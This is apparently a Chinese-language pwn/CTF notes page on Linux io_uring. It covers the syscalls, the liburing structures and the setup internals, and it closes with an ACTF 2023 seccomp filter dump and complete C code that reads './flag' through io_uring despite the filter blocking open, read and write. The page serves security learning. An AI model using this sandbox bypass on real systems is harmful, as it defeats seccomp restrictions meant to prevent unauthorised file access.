> For the complete documentation index, see [llms.txt](https://lightc.gitbook.io/pwn-gitbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lightc.gitbook.io/pwn-gitbook/kpwn/kpwn-tricks/io_uring.md).

# io\_uring

[Linux.io\_uring-Top-down-Approach | V3rdant's Blog](https://v3rdant.cn/Linux.io_uring-Top-down-Approach/)

## what's io\_uring

```c
425	common	io_uring_setup		sys_io_uring_setup
426	common	io_uring_enter		sys_io_uring_enter
427	common	io_uring_register	sys_io_uring_register
```

`io_uring` 是 `Linux 5.1` 引入的一个**高性能异步 I/O 接口**，形式灵活通用，可以将多个 `I/O` 请求发给内核处理，批量接收结果，减少用户态和内核态转换的开销

### 组成

1. `SQ`
2. `CQ`
3. `SQEs`
4. `CQEs`

### 调用

`io_uring_setup` 创造一个 `io_uring` 实例，返回一个 `fd` ，利用这个 `fd` 操作 `mmap` 出 `SQ/CQ`

`io_uring_enter` 提交 `SQ` 里的请求

`io_uring_register` 注册资源，内核可以长期引用这些资源，减少反复准备成本，降低开销

### 流程

```c
struct io_uring ring={0};
io_uring_queue_init(QUEUE_DEPTH, &ring, 0);

struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);

io_uring_prep_read(sqe, fd, buf, len, offset);
sqe->user_data = 123;

io_uring_submit(&ring);

struct io_uring_cqe *cqe;
io_uring_wait_cqe(&ring, &cqe);

if (cqe->res < 0) {
    // error: -cqe->res
} else {
    // success: cqe->res bytes read
}

io_uring_cqe_seen(&ring, cqe);
io_uring_queue_exit(&ring);
```

### 相关接口

#### liburing

**结构体**

其结构体可见

[liburing/src/include/liburing.h at master · axboe/liburing](https://github.com/axboe/liburing/blob/master/src/include/liburing.h)

```c
struct io_uring {
	struct io_uring_sq sq;
	struct io_uring_cq cq;
	unsigned flags;
	int ring_fd;

	unsigned features;
	int enter_ring_fd;
	__u8 int_flags;
	__u8 pad[3];
	unsigned pad2;
};
```

其关键的成员为 `io_uring_sq` 和 `io_uring_cq`

```c
struct io_uring_sq {
	unsigned *khead;
	unsigned *ktail;
	// Deprecated: use `ring_mask` instead of `*kring_mask`
	unsigned *kring_mask;
	// Deprecated: use `ring_entries` instead of `*kring_entries`
	unsigned *kring_entries;
	unsigned *kflags;
	unsigned *kdropped;
	unsigned *array;
	struct io_uring_sqe *sqes;

	unsigned sqe_head;
	unsigned sqe_tail;

	size_t ring_sz;
	void *ring_ptr;

	unsigned ring_mask;
	unsigned ring_entries;

	unsigned sqes_sz;
	unsigned pad;
};
```

其关键的成员为 `sqes`，指向请求队列（在共享内存里）

还有 `ring_prt` 指向 `mmap` 的共享内存，内核处理 `io_uring` 时使用信息

```c
struct io_uring_cq {
	unsigned *khead;
	unsigned *ktail;
	// Deprecated: use `ring_mask` instead of `*kring_mask`
	unsigned *kring_mask;
	// Deprecated: use `ring_entries` instead of `*kring_entries`
	unsigned *kring_entries;
	unsigned *kflags;
	unsigned *koverflow;
	struct io_uring_cqe *cqes;

	size_t ring_sz;
	void *ring_ptr;

	unsigned ring_mask;
	unsigned ring_entries;

	unsigned pad[2];
};
```

![image-20260603201628647](/files/SV1FBIGlmK16ghKqIxYK)

![image-20260603201835035](/files/o2G84jbcwGJ32QHkgS18)

**io\_uring\_queue\_init**

`io_uring_queue_init` 通过 `io_uring_setup` 完成内核工作，并使用 `mmap` 将部分内核空间映射到用户态内存，通过共享内存方便用户态访问

```c
int io_uring_queue_init(unsigned entries, struct io_uring *ring,
			unsigned flags) LIBURING_NOEXCEPT;
->
int io_uring_queue_init_params(unsigned entries, struct io_uring *ring,
				struct io_uring_params *p) LIBURING_NOEXCEPT;
->
static int io_uring_queue_init_try_nosqarr(unsigned entries, struct io_uring *ring,
					   struct io_uring_params *p, void *buf,
					   size_t buf_size)
->
int __io_uring_queue_init_params(unsigned entries, struct io_uring *ring,
				 struct io_uring_params *p, void *buf,
				 size_t buf_size)
```

参数如下：

* `entry`：`sq` 队列大小
* `ring`：用户态管理 `io_uring` 的结构体
* `flags`

其函数可在[liburing/src/setup.c at master · axboe/liburing](https://github.com/axboe/liburing/blob/master/src/setup.c)查看

```c
int __io_uring_queue_init_params(unsigned entries, struct io_uring *ring,
				 struct io_uring_params *p, void *buf,
				 size_t buf_size)
{
	int fd, ret = 0;
	unsigned *sq_array;
	unsigned sq_entries, index;

	memset(ring, 0, sizeof(*ring));

	/*
	 * The kernel does this check already, but checking it here allows us
	 * to avoid handling it below.
	 */
	if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY
	    && !(p->flags & IORING_SETUP_NO_MMAP))
		return -EINVAL;

	if (p->flags & IORING_SETUP_NO_MMAP) {
		ret = io_uring_alloc_huge(entries, p, &ring->sq, &ring->cq,
						buf, buf_size);
		if (ret < 0)
			return ret;
		if (buf)
			ring->int_flags |= INT_FLAG_APP_MEM;
	}

	fd = __sys_io_uring_setup(entries, p);
	if (fd < 0) {
		if ((p->flags & IORING_SETUP_NO_MMAP) &&
		    !(ring->int_flags & INT_FLAG_APP_MEM)) {
			__sys_munmap(ring->sq.sqes, ring->sq.sqes_sz);
			io_uring_unmap_rings(&ring->sq, &ring->cq);
		}
		return fd;
	}

	if (!(p->flags & IORING_SETUP_NO_MMAP)) {
		ret = io_uring_queue_mmap(fd, p, ring);
		if (ret) {
			__sys_close(fd);
			return ret;
		}
	} else {
		io_uring_setup_ring_pointers(p, &ring->sq, &ring->cq);
	}

	/*
	 * Directly map SQ slots to SQEs
	 */
	sq_entries = ring->sq.ring_entries;

	if (!(p->flags & IORING_SETUP_NO_SQARRAY)) {
		sq_array = ring->sq.array;
		for (index = 0; index < sq_entries; index++)
			sq_array[index] = index;
	}
	ring->features = p->features;
	ring->flags = p->flags;
	ring->enter_ring_fd = fd;
	if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY) {
		ring->ring_fd = -1;
		ring->int_flags |= INT_FLAG_REG_RING | INT_FLAG_REG_REG_RING;
	} else {
		ring->ring_fd = fd;
	}
	/*
	 * IOPOLL always needs to enter, except if SQPOLL is set as well.
	 * Use an internal flag to check for this.
	 */
	if ((ring->flags & (IORING_SETUP_IOPOLL|IORING_SETUP_SQPOLL)) ==
			IORING_SETUP_IOPOLL)
		ring->int_flags |= INT_FLAG_CQ_ENTER;

	return ret;
}
```

没有 `IORING_SETUP_REGISTERED_FD_ONLY` 和 `IORING_SETUP_NO_MMAP` 时会直接 `__sys_io_uring_setup`，此时没有设置 `IORING_SETUP_NO_MMAP` 会 `io_uring_queue_mmap` 后返回，反之则使用 `io_uring_setup_ring_pointers` 设置指针和结构体

`io_uring_get_sqe` 返回对应的 `sqe`，用户在其中设置需要完成的任务后，使用 `io_uring_submit` 提交请求

**io\_uring\_alloc\_huge**

上面提到，没有 `IORING_SETUP_REGISTERED_FD_ONLY` 和 `IORING_SETUP_NO_MMAP` 时会直接 `__sys_io_uring_setup`，但是没有 `IORING_SETUP_REGISTERED_FD_ONLY` 却有 `IORING_SETUP_NO_MMAP` 时会先 `io_uring_alloc_huge`，预先在用户态设置 `SQ` 和 `CQ` 的内存

先计算所需内存

```c
sqes_mem = sq_entries * sizeof(struct io_uring_sqe);
sqes_mem = (sqes_mem + page_size - 1) & ~(page_size - 1);
ring_mem = cq_entries * sizeof(struct io_uring_cqe);
if (p->flags & IORING_SETUP_CQE32)
	ring_mem *= 2;
if (!(p->flags & IORING_SETUP_NO_SQARRAY))
	ring_mem += sq_entries * sizeof(unsigned);
mem_used = sqes_mem + ring_mem;
mem_used = (mem_used + page_size - 1) & ~(page_size - 1);
```

如果用户传入了 `buf` 并且足够大则设置为用户 `buf`，设置

```c
sq->ring_ptr = (void *)sq->sqes + sqes_mem;
cq->ring_sz = 0;
sq->ring_sz = 0;
```

如果不够大则 `mmap` 出一块内存，设置

```c
sq->ring_ptr = ptr;
sq->ring_sz = buf_size;
cq->ring_sz = 0;
```

然后设置 `__sys_io_uring_setup` 的参数

```c
cq->ring_ptr = (void *) sq->ring_ptr;
p->sq_off.user_addr = (unsigned long) sq->sqes;
p->cq_off.user_addr = (unsigned long) sq->ring_ptr;
```

**io\_uring\_queue\_mmap**

没有设置 `IORING_SETUP_NO_MMAP` 的会进入这个函数，再进入 `io_uring_mmap`，计算 `sq` 和 `cq` 的 `ring` 的 `size`，`__sys_mmap` 出 `sq` 和 `cq` 的 `ring` 的指针（设置了 `IORING_FEAT_SINGLE_MMAP` 则 `cq` 使用 `sq` 通过 `mmap` 出来的同一块内存，否则分别单独 `mmap`）

然后`__sys_mmap` 出 `sq->sqes` 的内存

然后进入 `io_uring_setup_ring_pointers` 设置指针

**请求函数**

所有的请求有

[liburing/src/include/liburing.h at master · axboe/liburing](https://github.com/axboe/liburing/blob/master/src/include/liburing.h)

常见的有

```c
io_uring_prep_openat()
io_uring_prep_close()
io_uring_prep_read()
io_uring_prep_write()
io_uring_prep_readv()
io_uring_prep_writev()
io_uring_prep_fsync()
io_uring_prep_statx()
```

#### kernel

`io_ring_ctx`

`io_uring_params`

`io_uring_sqe/io_uring_cqe`

对应结构体可以自己查看

[ACTF 2023 Writeup - 星盟安全团队](https://blog.xmcve.com/2023/10/31/ACTF-2023-Writeup)

```bash
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x19 0xc000003e  if (A != ARCH_X86_64) goto 0027
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x16 0xffffffff  if (A != 0xffffffff) goto 0027
 0005: 0x15 0x15 0x00 0x00000000  if (A == read) goto 0027
 0006: 0x15 0x14 0x00 0x00000001  if (A == write) goto 0027
 0007: 0x15 0x13 0x00 0x00000002  if (A == open) goto 0027
 0008: 0x15 0x12 0x00 0x00000011  if (A == pread64) goto 0027
 0009: 0x15 0x11 0x00 0x00000012  if (A == pwrite64) goto 0027
 0010: 0x15 0x10 0x00 0x00000013  if (A == readv) goto 0027
 0011: 0x15 0x0f 0x00 0x00000014  if (A == writev) goto 0027
 0012: 0x15 0x0e 0x00 0x00000028  if (A == sendfile) goto 0027
 0013: 0x15 0x0d 0x00 0x0000002c  if (A == sendto) goto 0027
 0014: 0x15 0x0c 0x00 0x0000002e  if (A == sendmsg) goto 0027
 0015: 0x15 0x0b 0x00 0x0000003b  if (A == execve) goto 0027
 0016: 0x15 0x0a 0x00 0x00000101  if (A == openat) goto 0027
 0017: 0x15 0x09 0x00 0x00000127  if (A == preadv) goto 0027
 0018: 0x15 0x08 0x00 0x00000128  if (A == pwritev) goto 0027
 0019: 0x15 0x07 0x00 0x0000012f  if (A == name_to_handle_at) goto 0027
 0020: 0x15 0x06 0x00 0x00000130  if (A == open_by_handle_at) goto 0027
 0021: 0x15 0x05 0x00 0x00000142  if (A == execveat) goto 0027
 0022: 0x15 0x04 0x00 0x00000147  if (A == preadv2) goto 0027
 0023: 0x15 0x03 0x00 0x00000148  if (A == pwritev2) goto 0027
 0024: 0x15 0x02 0x00 0x000001ac  if (A == 0x1ac) goto 0027
 0025: 0x15 0x01 0x00 0x000001b5  if (A == 0x1b5) goto 0027
 0026: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0027: 0x06 0x00 0x00 0x00000000  return KILL
```

即使禁用了`orw`还是可以`orw`

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <liburing.h>
#include <unistd.h>
#include <syscall.h>
#include <sys/prctl.h>

#define QUEUE_DEPTH 1

int main() {
    struct io_uring ring = {0};
    struct io_uring_sqe *sqe;
    struct io_uring_cqe *cqe;
    int fd, ret;
    char buffer[4096] = {0};

    if (io_uring_queue_init(QUEUE_DEPTH, &ring, 0) < 0) {
        perror("io_uring_queue_init");
        return 1;
    }

    // 准备打开操作
    sqe = io_uring_get_sqe(&ring);
    if (!sqe) {
        fprintf(stderr, "Failed to get SQE\n");
        return 1;
    }

    int dirfd = AT_FDCWD;  // 当前工作目录的文件描述符
    const char *pathname = "./flag";
    int flags = O_RDONLY;

    io_uring_prep_openat(sqe, dirfd, pathname, flags, 0);
    io_uring_sqe_set_data(sqe, NULL);

    // 提交请求
    ret = io_uring_submit(&ring);
    if (ret < 0) {
        perror("io_uring_submit");
        return 1;
    }

    // 等待完成
    ret = io_uring_wait_cqe(&ring, &cqe);
    if (ret < 0) {
        perror("io_uring_wait_cqe");
        return 1;
    }

    // 处理完成的请求
    if (cqe->res < 0) {
        fprintf(stderr, "Open error: %d\n", cqe->res);
        return 1;
    }

    fd = cqe->res;  // 获取打开的文件描述符

    // 准备读取操作
    sqe = io_uring_get_sqe(&ring);
    if (!sqe) {
        fprintf(stderr, "Failed to get SQE\n");
        return 1;
    }

    io_uring_prep_read(sqe, fd, buffer, sizeof(buffer), 0);
    io_uring_sqe_set_data(sqe, NULL);

    // 提交请求
    ret = io_uring_submit(&ring);
    if (ret < 0) {
        perror("io_uring_submit");
        return 1;
    }

    // 等待完成
    ret = io_uring_wait_cqe(&ring, &cqe);
    if (ret < 0) {
        perror("io_uring_wait_cqe");
        return 1;
    }

    // 处理完成的请求
    if (cqe->res < 0) {
        fprintf(stderr, "Read error: %d\n", cqe->res);
        return 1;
    }

    // 准备写操作
    sqe = io_uring_get_sqe(&ring);
    if (!sqe) {
        fprintf(stderr, "Failed to get SQE\n");
        return 1;
    }

    io_uring_prep_write(sqe, 1, buffer, strlen(buffer), 0);
    io_uring_sqe_set_data(sqe, NULL);

    // 提交请求
    ret = io_uring_submit(&ring);
    if (ret < 0) {
        perror("io_uring_submit");
        return 1;
    }

    // 等待完成
    ret = io_uring_wait_cqe(&ring, &cqe);
    if (ret < 0) {
        perror("io_uring_wait_cqe");
        return 1;
    }

    // 处理完成的请求
    if (cqe->res < 0) {
        fprintf(stderr, "Read error: %d\n", cqe->res);
        return 1;
    }

    // printf("Read %d bytes: %s\n", cqe->res, buffer);

    // 清理并关闭文件
    io_uring_cqe_seen(&ring, cqe);
    io_uring_queue_exit(&ring);
    close(fd);
    sleep(1);

    return 0;
}
```
